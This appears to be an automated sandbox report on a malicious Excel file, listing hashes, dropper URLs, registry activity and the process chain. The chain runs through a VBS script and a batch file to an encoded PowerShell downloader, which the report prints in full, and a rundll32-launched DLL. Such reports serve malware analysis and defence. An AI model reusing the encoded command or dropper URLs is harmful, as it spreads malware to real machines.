89dbb0e62b66305ca1fee67fa6832cf321ec12e636799c18e0d7e1aeddce8c35

Analysis

max time kernel
16s
max time network
17s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
02/09/2024, 21:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

89dbb0e62b66305ca1fee67fa6832cf321ec12e636799c18e0d7e1aeddce8c35.xls
Size

151KB
MD5

57ae9a272db8afd8070654e33aad712e
SHA1

7d843ebfbc5f3c39fae771282397fb32167ec1c1
SHA256

89dbb0e62b66305ca1fee67fa6832cf321ec12e636799c18e0d7e1aeddce8c35
SHA512

17446c77f0fc0058a7b947c4460c362bccccc9262a9543a9680bc6c8ff83219319656853665e33a7b295e91908b31159bc7b9351271896791f0cc2d18815c6dd
SSDEEP

3072:hcKoSsxzNDZLDZjlbR868O8KlVH3dehvMqAPjxO5xyZUE5V5xtezEVg8/dg1Gx0n:hcKoSsxzNDZLDZjlbR868O8KlVH3dehD

Score

10^/10

discovery

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://aishyana.com/wp-admin/6pY001tdOxYb10/

exe.dropper

https://nccikeja.com/back/lOo46UEiVanm/

exe.dropper

https://mail.themintlist.com/wp-includes/S5xbjWOoM75ysw9xaM/

exe.dropper

https://karaah.com/kvxtqec/L8mqXiKjN95uoFOQqDS/

exe.dropper

https://mail.terinhumphrey.com/tasty-crab-promo/qBdohcsqomjFk/

exe.dropper

https://mail.gymcoachjose.com/ew9iwl/av20pfJZ44/

exe.dropper

https://sahayoghospitals.com/older/NFPLtNt4M3D1yYt/

exe.dropper

http://3.130.37.158/wp-admin/YDjVQgZv/

exe.dropper

https://stntools.com/js/uhTyC/

exe.dropper

https://www.dirtduel.com/db/v4gdL66Y/

exe.dropper

https://advancedguerrillamarketing.com/assets/oUD/

exe.dropper

https://orelco.net/wp-admin/5NiO/

exe.dropper

http://gainc.info/product3_files/PwAGXtbf6tn5r/

exe.dropper

https://astronomy24x7.com/wp-content/05ZGtxtrfIxNVb0M/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	2812	2060	wscript.exe	29

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wscript.exe

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{45C889AF-1BF3-4CD7-A8AC-B5BBB78895A4}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\TypeLib\{45C889AF-1BF3-4CD7-A8AC-B5BBB78895A4}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2060	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2848	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2848	powershell.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2060	EXCEL.EXE
2060	EXCEL.EXE
2060	EXCEL.EXE
2060	EXCEL.EXE
2060	EXCEL.EXE

Suspicious use of WriteProcessMemory 23 IoCs

description	pid	Process	procid_target
PID 2060 wrote to memory of 2812	2060	EXCEL.EXE	30
PID 2060 wrote to memory of 2812	2060	EXCEL.EXE	30
PID 2060 wrote to memory of 2812	2060	EXCEL.EXE	30
PID 2060 wrote to memory of 2812	2060	EXCEL.EXE	30
PID 2812 wrote to memory of 2364	2812	wscript.exe	31
PID 2812 wrote to memory of 2364	2812	wscript.exe	31
PID 2812 wrote to memory of 2364	2812	wscript.exe	31
PID 2812 wrote to memory of 2364	2812	wscript.exe	31
PID 2364 wrote to memory of 2848	2364	cmd.exe	33
PID 2364 wrote to memory of 2848	2364	cmd.exe	33
PID 2364 wrote to memory of 2848	2364	cmd.exe	33
PID 2364 wrote to memory of 2848	2364	cmd.exe	33
PID 2812 wrote to memory of 2680	2812	wscript.exe	35
PID 2812 wrote to memory of 2680	2812	wscript.exe	35
PID 2812 wrote to memory of 2680	2812	wscript.exe	35
PID 2812 wrote to memory of 2680	2812	wscript.exe	35
PID 2680 wrote to memory of 2660	2680	cmd.exe	37
PID 2680 wrote to memory of 2660	2680	cmd.exe	37
PID 2680 wrote to memory of 2660	2680	cmd.exe	37
PID 2680 wrote to memory of 2660	2680	cmd.exe	37
PID 2680 wrote to memory of 2660	2680	cmd.exe	37
PID 2680 wrote to memory of 2660	2680	cmd.exe	37
PID 2680 wrote to memory of 2660	2680	cmd.exe	37

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\89dbb0e62b66305ca1fee67fa6832cf321ec12e636799c18e0d7e1aeddce8c35.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2060
- C:\Windows\SysWOW64\wscript.exe
  wscript c:\programdata\wetidjks.vbs
  2⤵
  - Process spawned unexpected child process
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2812
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\programdata\jledshf.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2364
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -enc JABHAGQAcgBoAGsANAA9ACIAaAB0AHQAcAA6AC8ALwBhAGkAcwBoAHkAYQBuAGEALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADYAcABZADAAMAAxAHQAZABPAHgAWQBiADEAMAAvACwAaAB0AHQAcABzADoALwAvAG4AYwBjAGkAawBlAGoAYQAuAGMAbwBtAC8AYgBhAGMAawAvAGwATwBvADQANgBVAEUAaQBWAGEAbgBtAC8ALABoAHQAdABwAHMAOgAvAC8AbQBhAGkAbAAuAHQAaABlAG0AaQBuAHQAbABpAHMAdAAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AUwA1AHgAYgBqAFcATwBvAE0ANwA1AHkAcwB3ADkAeABhAE0ALwAsAGgAdAB0AHAAcwA6AC8ALwBrAGEAcgBhAGEAaAAuAGMAbwBtAC8AawB2AHgAdABxAGUAYwAvAEwAOABtAHEAWABpAEsAagBOADkANQB1AG8ARgBPAFEAcQBEAFMALwAsAGgAdAB0AHAAcwA6AC8ALwBtAGEAaQBsAC4AdABlAHIAaQBuAGgAdQBtAHAAaAByAGUAeQAuAGMAbwBtAC8AdABhAHMAdAB5AC0AYwByAGEAYgAtAHAAcgBvAG0AbwAvAHEAQgBkAG8AaABjAHMAcQBvAG0AagBGAGsALwAsAGgAdAB0AHAAcwA6AC8ALwBtAGEAaQBsAC4AZwB5AG0AYwBvAGEAYwBoAGoAbwBzAGUALgBjAG8AbQAvAGUAdwA5AGkAdwBsAC8AYQB2ADIAMABwAGYASgBaADQANAAvACwAaAB0AHQAcABzADoALwAvAHMAYQBoAGEAeQBvAGcAaABvAHMAcABpAHQAYQBsAHMALgBjAG8AbQAvAG8AbABkAGUAcgAvAE4ARgBQAEwAdABOAHQANABNADMARAAxAHkAWQB0AC8ALABoAHQAdABwADoALwAvADMALgAxADMAMAAuADMANwAuADEANQA4AC8AdwBwAC0AYQBkAG0AaQBuAC8AWQBEAGoAVgBRAGcAWgB2AC8ALABoAHQAdABwAHMAOgAvAC8AcwB0AG4AdABvAG8AbABzAC4AYwBvAG0ALwBqAHMALwB1AGgAVAB5AEMALwAsAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGQAaQByAHQAZAB1AGUAbAAuAGMAbwBtAC8AZABiAC8AdgA0AGcAZABMADYANgBZAC8ALABoAHQAdABwAHMAOgAvAC8AYQBkAHYAYQBuAGMAZQBkAGcAdQBlAHIAcgBpAGwAbABhAG0AYQByAGsAZQB0AGkAbgBnAC4AYwBvAG0ALwBhAHMAcwBlAHQAcwAvAG8AVQBEAC8ALABoAHQAdABwAHMAOgAvAC8AbwByAGUAbABjAG8ALgBuAGUAdAAvAHcAcAAtAGEAZABtAGkAbgAvADUATgBpAE8ALwAsAGgAdAB0AHAAOgAvAC8AZwBhAGkAbgBjAC4AaQBuAGYAbwAvAHAAcgBvAGQAdQBjAHQAMwBfAGYAaQBsAGUAcwAvAFAAdwBBAEcAWAB0AGIAZgA2AHQAbgA1AHIALwAsAGgAdAB0AHAAcwA6AC8ALwBhAHMAdAByAG8AbgBvAG0AeQAyADQAeAA3AC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAA1AFoARwB0AHgAdAByAGYASQB4AE4AVgBiADAATQAvACIALgBTAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAoACQAcwB0ACAAaQBuACAAJABHAGQAcgBoAGsANAApAHsAJABoAGIAcgBrAGUAMgA9ACIAdgBiAGsAdwBrACIAOwAkAEcAcwBSAEUAdwB0ADQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABoAGQARwBlADUANQByAHUAcgA9ACIAYwA6AFwAcAByAG8AZwByAGEAbQBkAGEAdABhAFwAIgArACQAaABiAHIAawBlADIAKwAiAC4AZABsAGwAIgA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHMAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAaABkAEcAZQA1ADUAcgB1AHIAOwBpAGYAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAaABkAEcAZQA1ADUAcgB1AHIAKQB7AGkAZgAoACgARwBlAHQALQBJAHQAZQBtACAAJABoAGQARwBlADUANQByAHUAcgApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAJABnAGgARABEAEYASgBIAGsANQBmAD0AIgBjADoAXAB3AGkAIgArACIAbgBkAG8AdwBzAFwAcwB5AHMAdwBvACIAKwAiAHcANgA0AFwAcgB1AG4AZABsACIAKwAiAGwAMwAyAC4AZQB4AGUAIgA7ACQAYgBuAFoAUgA2ADUAZAA9ACQAaABkAEcAZQA1ADUAcgB1AHIAKwAiACwAZgAiACsAJABHAHMAUgBFAHcAdAA0ADsAYgByAGUAYQBrADsAfQB9AH0A
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2848
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2680
  - - \??\c:\windows\syswow64\rundll32.exe
      c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd
      4⤵
      System Location Discovery: System Language Discovery
      PID:2660

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\programdata\jledshf.bat

Filesize
3KB

MD5
d8220bb8385825eff7fe5e22bf2eb885

SHA1
cf3028eb0ba914cdb699b13c3d7ef54e764c5f83

SHA256
6c2eb6914bd455d15ba66d2e108ebfbc9f67c6d4d7e4ef6df1ff624946761927

SHA512
4f2c32fae7d618b12cb827130df0efe2842de0ed34a68c74db576d19b17c6ac939150aea421f8867238688b8280ca7231e870d5144320bd7a839c67a6370ea1f

Download Submit
\??\c:\programdata\wetidjks.vbs

Filesize
331B

MD5
3b1981c56995aa93dfac052238402b1a

SHA1
36676ee9ff2096b8c9d6179ea3db2d1a93c6cb04

SHA256
fca2b52421d1f71dd2e058f604346b853f621c5625e5a42006583bf8115797f1

SHA512
f82962b1faaa93749684b2f8d77e02133b5a8ac64d984effd341324afd034adb8c69af1d812a69df10fd2fa924885c30e590365d23281bef5bbfa52f39e31a8a

Download Submit
memory/2060-6-0x0000000006C20000-0x0000000006D20000-memory.dmp

Filesize
1024KB

Download
memory/2060-27-0x0000000006A20000-0x0000000006B20000-memory.dmp

Filesize
1024KB

Download
memory/2060-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2060-4-0x0000000000510000-0x0000000000610000-memory.dmp

Filesize
1024KB

Download
memory/2060-8-0x0000000000510000-0x0000000000610000-memory.dmp

Filesize
1024KB

Download
memory/2060-7-0x0000000000510000-0x0000000000610000-memory.dmp

Filesize
1024KB

Download
memory/2060-26-0x0000000006A20000-0x0000000006B20000-memory.dmp

Filesize
1024KB

Download
memory/2060-5-0x0000000000510000-0x0000000000610000-memory.dmp

Filesize
1024KB

Download
memory/2060-28-0x0000000006A20000-0x0000000006B20000-memory.dmp

Filesize
1024KB

Download
memory/2060-3-0x0000000000510000-0x0000000000610000-memory.dmp

Filesize
1024KB

Download
memory/2060-1-0x000000007249D000-0x00000000724A8000-memory.dmp

Filesize
44KB

Download
memory/2060-33-0x000000007249D000-0x00000000724A8000-memory.dmp

Filesize
44KB

Download
memory/2060-34-0x0000000000510000-0x0000000000610000-memory.dmp

Filesize
1024KB

Download
memory/2060-35-0x0000000006A20000-0x0000000006B20000-memory.dmp

Filesize
1024KB

Download
memory/2060-36-0x0000000006A20000-0x0000000006B20000-memory.dmp

Filesize
1024KB

Download
memory/2060-37-0x0000000006A20000-0x0000000006B20000-memory.dmp

Filesize
1024KB

Download